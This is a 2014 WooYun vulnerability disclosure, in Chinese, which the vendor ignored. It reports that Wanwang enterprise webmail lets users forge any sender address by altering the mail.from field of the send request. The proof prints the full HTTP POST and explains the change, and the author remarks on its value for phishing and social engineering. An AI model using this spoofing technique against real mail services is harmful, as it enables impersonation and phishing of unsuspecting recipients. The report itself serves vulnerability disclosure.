当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-069569

漏洞标题:万网企业邮箱任意发件地址伪造“漏洞”

相关厂商:万网

漏洞作者: unic02n

提交时间:2014-07-24 17:36

修复时间:2014-07-29 17:38

公开时间:2014-07-29 17:38

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-07-24: 细节已通知厂商并且等待厂商处理中
2014-07-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

万网企业邮箱,存在任意发件地址伪造“漏洞”。

详细说明:

这个算不算厂商漏洞呢?
有人说不算厂商漏洞,因为可以任意搭建自己的服务器去发送类似的邮件。不过,我认为这属于漏洞。
我使用你们的业务,收费的业务。我居然可以收到一个伪造的邮件,这不算漏洞么?服务方不该负责任么?
具体算不算漏洞,大家可以一起来看看。

漏洞证明:

企业邮箱(非新版),发送邮件,其实是一个post ,内容如下:
POST /mailview/mailWrite/do_send.htm HTTP/1.1
Host: mail.test.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 6003
relatedViewDate=&asToken=&email=&fromMaillist=&_sessionToken=token&_formResubmitToken=token&directShow=&mail.mailId=&mail.oldMailId=&oldMailIds=&mail.mailTimingSend=&mail.separatedSend=0&mail.tos=%E9%83%91%E6%B6%9B%[email protected]%3E&mail.ccs=&mail.bcs=&mail.subject=hello,world&mail.content=123123&mail.textContent=222222&mail.isPriority=&mail.isNotification=&folderId=&attachs=&writeMail=1&firstSave=1&totalSpace=600M&replyOldMailid=&isReplyedMail=&relayOldMailid=&isRelayedMail=&remainSpaceByte=&totalSpaceByte=&mail.isDraft=&mail.textType=2&mail.envId=&mail.messageId=&mail.references=&mail.inReplyTo=&netdiskFileInfo=&[email protected]&mail.extendType=1
mail.tos :目标
mail.from :发送邮件地址
修改mail.from 即可伪造任意的发件地址。其实操作是很简单的。
实际效果呢?
同域内的伪造邮件,肯定很爽的,完全没有任何瑕疵。钓鱼社工什么的,那是杠杠的。

4.jpg


跨域的时候,如果使用web收发邮件,则会出现代发字样,而使用foxmail 的客户端则不会有代发字样。如下:

6.jpg


鉴于当前客户端收发的比例,此处的小瑕疵算是可以忽略吧。

修复方案:

不知道,你们自己看吧,
你们觉得不是漏洞那就继续留着吧,

版权声明:转载请注明来源 unic02n@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-07-29 17:38

厂商回复:

最新状态:

暂无